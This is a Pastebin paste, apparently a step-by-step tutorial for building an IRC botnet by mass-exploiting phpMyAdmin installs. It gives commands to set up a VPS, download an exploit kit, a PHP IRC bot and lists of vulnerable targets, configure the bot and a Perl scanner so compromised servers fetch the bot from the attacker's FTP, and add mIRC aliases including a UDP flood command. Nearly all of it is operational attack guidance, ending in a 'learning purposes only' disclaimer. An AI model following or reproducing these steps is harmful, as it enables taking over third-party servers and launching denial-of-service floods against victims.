Guest User

Untitled

a guest
Mar 24th, 2016
1,902
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.57 KB | None | 0 0
  1. -=|--------------------------------------------------|=-
  2. -=| PMA - PhpMyAdmin Exploit |=-
  3. -=| Tutorial By -@fuckSDN |=-
  4. -=|-----------------------------------------------------|=-
  5. -=|This Tutorial Explains Everything You Need!! |=-
  6. -=|-----------------------------------------------------|=-
  7.  
  8. ================================
  9. -[What You Need]-
  10. 1. A IRC Server Running
  11. 2. VPS Server
  12. 3. Basic Linux Knowledge
  13. ================================
  14.  
  15. ?> Step 1: Log Into Your VPS Server As root.
  16. ?> Step 2: Run This List Of CMD's 1 At A Time;
  17. ""
  18. yum update -y
  19. yum install wget -y
  20. yum install nano -y
  21. yum install unrar -y (if this does not download type;
  22. "wget h t t p : / / pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.i686.rpm"
  23. "rpm -Uvh rpmforge-release-0.5.2-2.el6.rf.i686.rpm"
  24. yum install gcc -y
  25. yum install perl* -y
  26. yum install python* -y
  27. yum install cpan -y
  28. ""
  29. ?> Step 3: Type the Cmd "cpan"
  30. ?> Step 4: Install All These Modules 1 At A Time;
  31. ""
  32. install Parallel::ForkManager
  33. install URI::_foreign
  34. install LWP
  35. install Time::HiRes
  36. install MIME::Base64
  37. ""
  38. ?> Step 5: Type This CMD "wget
  39. w w w . dropbox.com/s/0frhu4wkvoo819l/pma.rar"
  40. ?> Step 6: Type "unrar x pma.rar"
  41. ?> Step 7: Now Login To Your IRC Hosting Server
  42. ?> Step 8: Type In "yum install vsftpd -y" and then type "service vsftpd start"
  43. ?> Step 9: Check If The FTP Is Online Go To Your Browser And Type In ftp://(PUT YOUR IRC IP HERE) and click enter an index should show.
  44. ?> Step 10: Go Back To Your IRC Server Type In "cd /var/ftp/pub" then "wget w w w . dropbox.com/s/6noagiee994pl0v/bot.php"
  45. ?> Step 11: Type "nano bot.php" And Use The Arrow Keys To Find A Spot In Near The Top Of The Code That Looks Like This
  46. ""
  47. class pBot
  48. {
  49. var $config = array("server"=>"IRC SERVER IP HERE", "port"=>"IRC PORT","key"=>"","prefix"=>"FBI", "maxrand"=>"6", "chan"=>"#IRC CHANNEL","trigger"=>"-","hostauth"=>"FBI.gov");
  50. ""
  51. ?> Step 12: Change The IP, Port, Channel To Your Information That You Set *Note The Channel Can Be What You Want The Bots To Join.
  52. ?> Step 13: After You Have Correctly Changed All The Formation Do CMD "CTRL+X" And The "y" "enter" to save.
  53. ?> Step 14: Change Back Over To The Server We Started On the Server We're Setting PMA On.
  54. ?> Step 15: Type "cd pma"
  55. ?> Step 16: On Your Browser Go Onto Your IRC FTP And Refresh And Click "pub/" and then click "bot.php"
  56. ?> Step 17: Once You're On Your Bot You Should See The Code In The Browser Copy The Bot URL e.g. " f t p : //1.1.1.1/pub/pma_bot.php"
  57. ?> Step 18: Go Onto Your PMA VPS And Type "nano x.pl" and find a line of code that looks like this
  58. ""
  59. my $ftp = "PUT YOUR FTP LINK HERE"; #put your ftp link here
  60. ""
  61. ?> Step 19: Paste Your FTP Link There And Then Press "CTRL+X" "y" "enter"
  62. ?> Step 20: Open MIRC and Connect To Your IRC and Open Script Editor and Paste In Aliases
  63. ""
  64. /400 /samode $chan +q $me | /samode $chan +o $me | /names $chan
  65. /udp /say -udp $$?="ip" $$?="port" $$?="time" $$?="packetsize"
  66. ""
  67. ?> Step 21: On Your PMA VPS Type "cd pma" and then "wget w w w . dropbox.com/s/i8lgzce6yq09jpc/vuln.rar"
  68. ?> Step 22: Type in "unrar e vuln.rar"
  69. ?> Step 23: Now You Have Setup PMA To Start Scanning Lists Type "ls" To View All The Files Then Type "perl x.pl (list) -x"
  70. ""
  71. (list) = any vuln there e.g. crazy_vuln.txt
  72. ""
  73. ?> Step 24: To View The Bots Coming In Join The Channel You Set Them To Join "/join #(whatever)" Then Type "/400"
  74. ###################################################
  75. This Has Been For Learning Purposes Only. I Do Not Take Any Responsibility For What You Do With It!
  76. Contact me: sinden@riseup(dot)net
  77. Tweet @ Me @fuckSDN
Add Comment
Please, Sign In to add comment